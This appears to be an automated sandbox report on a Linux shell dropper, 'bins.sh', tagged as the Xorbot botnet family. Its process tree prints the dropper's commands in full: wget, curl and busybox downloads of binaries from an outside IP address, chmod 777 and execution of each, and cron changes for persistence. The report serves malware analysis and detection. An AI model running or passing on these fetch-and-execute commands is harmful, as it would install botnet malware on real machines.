Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
05/12/2024, 06:22
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
d46a3232f2d9e39c42e2378e3b9ee5f6
-
SHA1
1c15292de404d15bfb04ffd8af708533296f3d87
-
SHA256
273e3c9752c4ac7d7525722250b775dc812f042fb3f98d007663ca7f6e374f95
-
SHA512
d6c231f3e22e63ecb5b7e3e9e3b124499280bc190ed2fc49b52e4ded2562482f761eb2ca23ca3e7e21cef55306de30948802b94cbd460696c973d3656aa8ef15
-
SSDEEP
192:xiE2+Yb3TjllJkOq6v3XJZJeyWQpFXGOq6v3lJZJeyzlgd2+Yb3Ty:xipllGQpFllgr
Malware Config
Signatures
-
resource yara_rule behavioral4/files/fstream-10.dat family_xorbot behavioral4/files/fstream-11.dat family_xorbot -
Xorbot family
-
Contacts a large (1684) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 745 chmod 760 chmod 788 chmod 892 chmod 738 chmod -
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB 739 zZM090BtLw96clc18K3325Bi3InWJUorwB /tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG 746 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG /tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 761 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 /tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX 790 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX /tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS 893 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS -
Renames itself 1 IoCs
pid Process 762 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.CQctKB crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/1040/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/7/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/75/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/144/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/855/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/870/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/986/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/71/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/843/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/938/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/994/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1044/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/18/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/898/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/946/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1029/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1045/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/19/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/944/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/958/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1052/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1043/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/82/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/470/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/700/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/709/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/780/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/834/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/775/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/832/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/891/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1027/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/770/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/798/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/814/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/820/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/992/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/904/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1032/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1049/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/10/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/387/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/805/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/841/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1003/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1017/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/872/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/895/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/70/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/860/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/862/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/893/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1020/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/1039/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/997/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/115/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/799/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/821/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/886/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/896/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/918/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/991/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 File opened for reading /proc/999/cmdline OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG curl File opened for modification /tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 busybox File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB wget File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB busybox File opened for modification /tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG busybox File opened for modification /tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 wget File opened for modification /tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9 curl File opened for modification /tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX busybox File opened for modification /tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS busybox File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB curl File opened for modification /tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Writes file to tmp directory
PID:714
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Writes file to tmp directory
PID:737
-
-
/bin/chmodchmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB./zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵PID:741
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- Writes file to tmp directory
PID:744
-
-
/bin/chmodchmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- Writes file to tmp directory
PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- Writes file to tmp directory
PID:756
-
-
/bin/chmodchmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:761 -
/bin/shsh -c "crontab -l"3⤵PID:763
-
/usr/bin/crontabcrontab -l4⤵PID:765
-
-
-
/bin/shsh -c "crontab -"3⤵PID:767
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:768
-
-
-
-
/bin/rmrm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵PID:771
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵PID:775
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵PID:778
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- Writes file to tmp directory
PID:779
-
-
/bin/chmodchmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- Writes file to tmp directory
PID:887
-
-
/bin/chmodchmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O2⤵PID:903
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5eeb852fad5ba552d4668c11ff19a02ab
SHA163f3f50db1bbac53b05b021341c117b6b439be88
SHA256c51694e5c33aada53a0767bb888569d1408997ec889b109907efb08f81c70a9c
SHA51254432658fc8f652babfc688b854ea98a58207935e8c4a157d6906c509d1b146d1cfaee18af2e784d79aabe5c44f50a5e92d6c326af0351916912c456a67441c8